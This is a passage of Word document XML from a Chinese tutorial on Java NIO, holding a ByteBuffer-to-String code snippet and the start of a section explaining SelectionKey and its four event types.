                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>byteBuffer</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.get(</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>dst</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>try</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">String </w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>result</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> String(</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>dst</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>"utf-8"</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>System.</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000C0"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>out</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.println(</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>result</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">} </w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>catch</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (UnsupportedEncodingException </w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.printStackTrace();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00193184" w:rsidRDefault="00193184" w:rsidP="00193184"/>
    <w:p w:rsidR="006F0946" w:rsidRPr="005346BD" w:rsidRDefault="006F0946" w:rsidP="00193184">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3140710" cy="3021330"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="7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4" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3140710" cy="3021330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F531F0" w:rsidRPr="00F41A4C" w:rsidRDefault="006752A9" w:rsidP="006752A9">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00F531F0" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00193184">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SelectionKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F735F" w:rsidRPr="004F735F" w:rsidRDefault="004F735F" w:rsidP="004F735F">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F735F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java NIO的服务端只需启动一个专门的线程来处理所有的 IO 事件，这种通信模型是怎么实现的呢？呵呵，我们一起来探究它的奥秘吧。java NIO采用了双向通道（channel）进行数据传输，而不是单向的流（stream），在通道上可以注册我们感兴趣的事件。一共有以下四种事件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F735F" w:rsidRPr="004F735F" w:rsidRDefault="004F735F" w:rsidP="004F735F">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F735F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">事件名    </w:t>
      </w:r>
      <w:r w:rsidR="007A31C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
      <w:r w:rsidRPr="004F735F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应值    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F735F" w:rsidRPr="007A31C9" w:rsidRDefault="004F735F" w:rsidP="004F735F">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A31C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">服务端接收客户端连接事件    SelectionKey.OP_ACCEPT(16)    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F735F" w:rsidRPr="004F735F" w:rsidRDefault="004F735F" w:rsidP="004F735F">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A31C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">客户端连接服务端事件    </w:t>
      </w:r>
      <w:r w:rsidR="007A31C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="007A31C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">SelectionKey.OP_CONNECT(8) </w:t>
      </w:r>
      <w:r w:rsidRPr="004F735F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F735F" w:rsidRPr="004F735F" w:rsidRDefault="004F735F" w:rsidP="004F735F">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F735F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">读事件   </w:t>
      </w:r>
      <w:r w:rsidR="007A31C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
      <w:r w:rsidRPr="004F735F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SelectionKey.OP_READ(1)    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F735F" w:rsidRPr="004F735F" w:rsidRDefault="004F735F" w:rsidP="004F735F">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F735F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">写事件   </w:t>
      </w:r>
      <w:r w:rsidR="007A31C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
      <w:r w:rsidRPr="004F735F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SelectionKey.OP_WRITE(4)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A31C9" w:rsidRPr="007A31C9" w:rsidRDefault="007A31C9" w:rsidP="007A31C9">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A31C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当向Selector注册Channel时，register()方法会返回一个SelectionKey对象。这个对象包含了一些你感兴趣的属性：</w:t>
      </w:r>
    </w:p>
